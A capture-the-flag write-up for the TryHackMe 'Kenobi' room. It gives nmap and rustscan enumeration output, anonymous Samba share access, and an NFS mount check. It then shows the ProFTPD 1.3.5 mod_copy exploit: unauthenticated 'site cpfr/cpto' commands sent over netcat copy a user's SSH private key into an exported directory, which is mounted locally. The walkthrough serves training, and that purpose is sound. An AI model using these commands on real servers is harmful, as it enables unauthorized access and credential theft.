https://noxious.tech/posts/Kenobi/

https://tryhackme.com/room/kenobi

Enumeration

rustscan -a <TARGET_IP>

PORT      STATE SERVICE      REASON
21/tcp    open  ftp          syn-ack
22/tcp    open  ssh          syn-ack
80/tcp    open  http         syn-ack
111/tcp   open  rpcbind      syn-ack
139/tcp   open  netbios-ssn  syn-ack
445/tcp   open  microsoft-ds syn-ack
2049/tcp  open  nfs          syn-ack
36165/tcp open  unknown      syn-ack
37467/tcp open  unknown      syn-ack
42469/tcp open  unknown      syn-ack
44495/tcp open  unknown      syn-ack

nmap -sC -sV <TARGET_IP> -p 21,22,80,111,139,445,2049

PORT     STATE SERVICE     VERSION
21/tcp   open  ftp         ProFTPD 1.3.5
22/tcp   open  ssh         OpenSSH 7.2p2 Ubuntu 4ubuntu2.7 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 b3:ad:83:41:49:e9:5d:16:8d:3b:0f:05:7b:e2:c0:ae (RSA)
|   256 f8:27:7d:64:29:97:e6:f8:65:54:65:22:f7:c8:1d:8a (ECDSA)
|_  256 5a:06:ed:eb:b6:56:7e:4c:01:dd:ea:bc:ba:fa:33:79 (ED25519)
80/tcp   open  http        Apache httpd 2.4.18 ((Ubuntu))
| http-robots.txt: 1 disallowed entry 
|_/admin.html
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
111/tcp  open  rpcbind     2-4 (RPC #100000)
| rpcinfo: 
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100000  3,4          111/tcp6  rpcbind
|   100000  3,4          111/udp6  rpcbind
|   100003  2,3,4       2049/tcp   nfs
|   100003  2,3,4       2049/tcp6  nfs
|   100003  2,3,4       2049/udp   nfs
|   100003  2,3,4       2049/udp6  nfs
|   100005  1,2,3      36165/tcp   mountd
|   100005  1,2,3      48311/udp6  mountd
|   100005  1,2,3      48836/udp   mountd
|   100005  1,2,3      60131/tcp6  mountd
|   100021  1,3,4      33865/udp   nlockmgr
|   100021  1,3,4      34803/tcp6  nlockmgr
|   100021  1,3,4      44495/tcp   nlockmgr
|   100021  1,3,4      60660/udp6  nlockmgr
|   100227  2,3         2049/tcp   nfs_acl
|   100227  2,3         2049/tcp6  nfs_acl
|   100227  2,3         2049/udp   nfs_acl
|_  100227  2,3         2049/udp6  nfs_acl
139/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp  open  netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
2049/tcp open  nfs_acl     2-3 (RPC #100227)
Service Info: Host: KENOBI; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_clock-skew: mean: 2h00m00s, deviation: 3h27m52s, median: 0s
|_nbstat: NetBIOS name: KENOBI, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-os-discovery: 
|   OS: Windows 6.1 (Samba 4.3.11-Ubuntu)
|   Computer name: kenobi
|   NetBIOS computer name: KENOBI\\x00
|   Domain name: \\x00
|   FQDN: kenobi
|_  System time: 2022-02-22T08:46:04-06:00
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2022-02-22T14:46:04
|_  start_date: N/A

As port 111 was open , we will check with nmap to see if there are any mounts available :

nmap -p 111 --script=nfs-ls,nfs-statfs,nfs-showmount 10.10.197.74

PORT    STATE SERVICE
111/tcp open  rpcbind
| nfs-showmount:
|_  /var *

Enumerating Samba Shares:

smbclient -L \\\\\\\\<TARGET_IP>\\\\
	Sharename       Type      Comment
	---------       ----      -------
	print$          Disk      Printer Drivers
	anonymous       Disk      
	IPC$            IPC       IPC Service (kenobi server (Samba, Ubuntu))

We see that anonymous share is enabled, we can access it without providing any password :

smbclient \\\\\\\\<TARGET_IP>\\\\anonymous
smb: \\> ls
  .                                   D        0  Wed Sep  4 18:49:09 2019
  ..                                  D        0  Wed Sep  4 18:56:07 2019
  log.txt                             N    12237  Wed Sep  4 18:49:09 2019
		9204224 blocks of size 1024. 6877092 blocks available
smb: \\> get log.txt

log.txt

From the log.txt above we get to know that there is a ssh key created at the directory /home/kenobi/.ssh/id_rsa

Exploitation

Searching for exploits for ProFTPD 1.3.5 we find the following mod_copy exploit https://www.exploit-db.com/exploits/36742 This allows us to copy files from one directory to another without being authenticated As we had previously found the route to ssh keys from Kenobi and we know we can mount /var, we can just copy that ssh keys to /var :

nc <TARGET_IP> 21
220 ProFTPD 1.3.5 Server (ProFTPD Default Installation) [10.10.197.74]

site cpfr /home/kenobi/.ssh/id_rsa
350 File or directory exists, ready for destination name

site cpto /var/tmp/id_rsa
250 Copy successful

Now we just need to mount /var in our local machine :

sudo mount <TARGET_IP>:/var /mnt/

cd /mnt/
ls
backups  crash  local  log   opt  snap   tmp
cache    lib    lock   mail  run  spool  www

Based on the copy from netcat, the id_rsa is in the tmp folder

id_rsa